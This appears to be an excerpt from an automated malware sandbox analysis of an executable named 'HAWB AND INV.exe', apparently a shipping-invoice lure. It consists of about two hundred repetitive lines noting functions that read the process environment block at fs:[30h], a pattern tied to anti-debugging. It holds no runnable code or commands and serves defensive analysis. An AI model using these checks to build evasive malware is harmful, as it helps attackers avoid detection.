          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov ecx, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FB944 mov eax, dword ptr fs:[00000030h]10_2_011FB944
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FB944 mov eax, dword ptr fs:[00000030h]10_2_011FB944
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]10_2_011DB171
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]10_2_011DB171
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC962 mov eax, dword ptr fs:[00000030h]10_2_011DC962
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]10_2_012061A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]10_2_012061A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012569A6 mov eax, dword ptr fs:[00000030h]10_2_012569A6
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC182 mov eax, dword ptr fs:[00000030h]10_2_011FC182
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A185 mov eax, dword ptr fs:[00000030h]10_2_0120A185
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202990 mov eax, dword ptr fs:[00000030h]10_2_01202990
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012641E8 mov eax, dword ptr fs:[00000030h]10_2_012641E8
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]10_2_011DB1E1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]10_2_011DB1E1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]10_2_011DB1E1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]10_2_01257016
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]10_2_01257016
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]10_2_01257016
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]10_2_012A4015
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]10_2_012A4015
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]10_2_011F0050
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]10_2_011F0050
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01292073 mov eax, dword ptr fs:[00000030h]10_2_01292073
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1074 mov eax, dword ptr fs:[00000030h]10_2_012A1074
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012190AF mov eax, dword ptr fs:[00000030h]10_2_012190AF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9080 mov eax, dword ptr fs:[00000030h]10_2_011D9080
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov ecx, dword ptr fs:[00000030h]10_2_0120F0BF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]10_2_0120F0BF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]10_2_0120F0BF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]10_2_01253884
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]10_2_01253884
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D58EC mov eax, dword ptr fs:[00000030h]10_2_011D58EC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129131B mov eax, dword ptr fs:[00000030h]10_2_0129131B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DF358 mov eax, dword ptr fs:[00000030h]10_2_011DF358
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]10_2_01203B7A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]10_2_01203B7A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB40 mov eax, dword ptr fs:[00000030h]10_2_011DDB40
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8B58 mov eax, dword ptr fs:[00000030h]10_2_012A8B58
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB60 mov ecx, dword ptr fs:[00000030h]10_2_011DDB60
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]10_2_01204BAD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]10_2_01204BAD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]10_2_01204BAD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A5BA5 mov eax, dword ptr fs:[00000030h]10_2_012A5BA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]10_2_011E1B8F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]10_2_011E1B8F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129138A mov eax, dword ptr fs:[00000030h]10_2_0129138A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128D380 mov ecx, dword ptr fs:[00000030h]10_2_0128D380
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120B390 mov eax, dword ptr fs:[00000030h]10_2_0120B390
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202397 mov eax, dword ptr fs:[00000030h]10_2_01202397
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]10_2_012553CA
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]10_2_012553CA
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FDBE9 mov eax, dword ptr fs:[00000030h]10_2_011FDBE9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F3A1C mov eax, dword ptr fs:[00000030h]10_2_011F3A1C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]10_2_011DAA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]10_2_011DAA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]10_2_01214A2C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]10_2_01214A2C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]10_2_011D5210
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov ecx, dword ptr fs:[00000030h]10_2_011D5210
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]10_2_011D5210
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]10_2_011D5210
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E8A0A mov eax, dword ptr fs:[00000030h]10_2_011E8A0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]10_2_0129AA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]10_2_0129AA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]10_2_0128B260
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]10_2_0128B260
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8A62 mov eax, dword ptr fs:[00000030h]10_2_012A8A62
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121927A mov eax, dword ptr fs:[00000030h]10_2_0121927A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01264257 mov eax, dword ptr fs:[00000030h]10_2_01264257
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129EA55 mov eax, dword ptr fs:[00000030h]10_2_0129EA55
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FAB0 mov eax, dword ptr fs:[00000030h]10_2_0120FAB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EAAB0 mov eax, dword ptr fs:[00000030h]10_2_011EAAB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EAAB0 mov eax, dword ptr fs:[00000030h]10_2_011EAAB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120D294 mov eax, dword ptr fs:[00000030h]10_2_0120D294
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120D294 mov eax, dword ptr fs:[00000030h]10_2_0120D294
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202AE4 mov eax, dword ptr fs:[00000030h]10_2_01202AE4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202ACB mov eax, dword ptr fs:[00000030h]10_2_01202ACB
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129E539 mov eax, dword ptr fs:[00000030h]10_2_0129E539
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0125A537 mov eax, dword ptr fs:[00000030h]10_2_0125A537
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]10_2_01204D3B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]10_2_01204D3B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]10_2_01204D3B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8D34 mov eax, dword ptr fs:[00000030h]10_2_012A8D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAD30 mov eax, dword ptr fs:[00000030h]10_2_011DAD30
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F7D50 mov eax, dword ptr fs:[00000030h]10_2_011F7D50
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01213D43 mov eax, dword ptr fs:[00000030h]10_2_01213D43
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253540 mov eax, dword ptr fs:[00000030h]10_2_01253540
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC577 mov eax, dword ptr fs:[00000030h]10_2_011FC577
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC577 mov eax, dword ptr fs:[00000030h]10_2_011FC577
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012035A1 mov eax, dword ptr fs:[00000030h]10_2_012035A1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A05AC mov eax, dword ptr fs:[00000030h]10_2_012A05AC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A05AC mov eax, dword ptr fs:[00000030h]10_2_012A05AC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]10_2_01201DB5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]10_2_01201DB5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]10_2_01201DB5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FD9B mov eax, dword ptr fs:[00000030h]10_2_0120FD9B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FD9B mov eax, dword ptr fs:[00000030h]10_2_0120FD9B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01288DF1 mov eax, dword ptr fs:[00000030h]10_2_01288DF1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov ecx, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E0 mov eax, dword ptr fs:[00000030h]10_2_011ED5E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E0 mov eax, dword ptr fs:[00000030h]10_2_011ED5E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120BC2C mov eax, dword ptr fs:[00000030h]10_2_0120BC2C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]10_2_012A740D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]10_2_012A740D
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A740D mov eax, dword ptr fs:[00000030h] 10_2_012A740D
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h] 10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h] 10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h] 10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h] 10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h] 10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0120A44B mov eax, dword ptr fs:[00000030h] 10_2_0120A44B
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011F746D mov eax, dword ptr fs:[00000030h] 10_2_011F746D
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0126C450 mov eax, dword ptr fs:[00000030h] 10_2_0126C450
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0126C450 mov eax, dword ptr fs:[00000030h] 10_2_0126C450
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E849B mov eax, dword ptr fs:[00000030h] 10_2_011E849B
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012914FB mov eax, dword ptr fs:[00000030h] 10_2_012914FB
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h] 10_2_01256CF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h] 10_2_01256CF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h] 10_2_01256CF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A8CD6 mov eax, dword ptr fs:[00000030h] 10_2_012A8CD6
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011FF716 mov eax, dword ptr fs:[00000030h] 10_2_011FF716
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0120E730 mov eax, dword ptr fs:[00000030h] 10_2_0120E730
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A070D mov eax, dword ptr fs:[00000030h] 10_2_012A070D
